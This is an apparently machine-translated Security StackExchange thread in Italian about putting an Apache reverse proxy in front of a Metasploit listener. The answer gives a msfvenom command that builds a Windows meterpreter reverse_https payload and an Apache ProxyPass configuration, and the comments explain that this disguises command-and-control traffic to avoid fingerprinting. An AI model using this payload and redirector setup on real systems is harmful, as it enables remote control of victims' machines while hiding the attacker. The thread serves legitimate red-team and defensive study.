Inoltra Metasploit Richieste a un altro ip

Mi piacerebbe configurare un server Web Apache statico a casa che inoltra tutte le connessioni Metasploit in arrivo a un altro IP. È possibile? Se é cosi, come? Sto cercando di eseguire il server Apache su un RasPi B + se questo aiuta.

ip metasploit

Benvenuto in Security SE! Puoi fornire maggiori informazioni su ciò che stai cercando di realizzare?

— multithr3at3d

Costruendo il commento su @ multithr3at3d, non è chiaro cosa stai tentando. Apache è un server web e sarà in grado di reindirizzare il traffico Web sulla porta specifica in modo che non sia in grado di reindirizzare tutte le "connessioni metasploit" agli host remoti. Tuttavia, se l'interfaccia utente Web Metasploit è in esecuzione e si desidera semplicemente inviare il traffico Web dell'interfaccia utente a un server Web diverso, si consiglia di utilizzare e il proxy inverso Nginx.

— SuperAdmin

@schroeder Non OP qui, ma solitamente un server Apache o nginx valido è configurato in primo piano per due scopi: inoltrare richieste di campagne separate per separare i server C & amp; C e per mascherare le richieste come server legittimi HTTP per evitare le impronte digitali.

@void_in yeah, l'angolo delle impronte digitali ha molto senso, in realtà

— schroeder

Innanzitutto, crea il payload:

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

La parte più importante è la LURI che devi impostare su una risorsa specifica. Tutto il traffico generato dal carico utile sarà diretto verso questo URI.

Una volta completato, utilizzare la direttiva ProxyPass in Apache o nginx per inoltrare solo il traffico di / myawesomecnc all'host specifico desiderato. Ecco un esempio di Apache:

<VirtualHost *:443>

  ServerName www.totallyharmless.com
...
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>

— void_in
fonte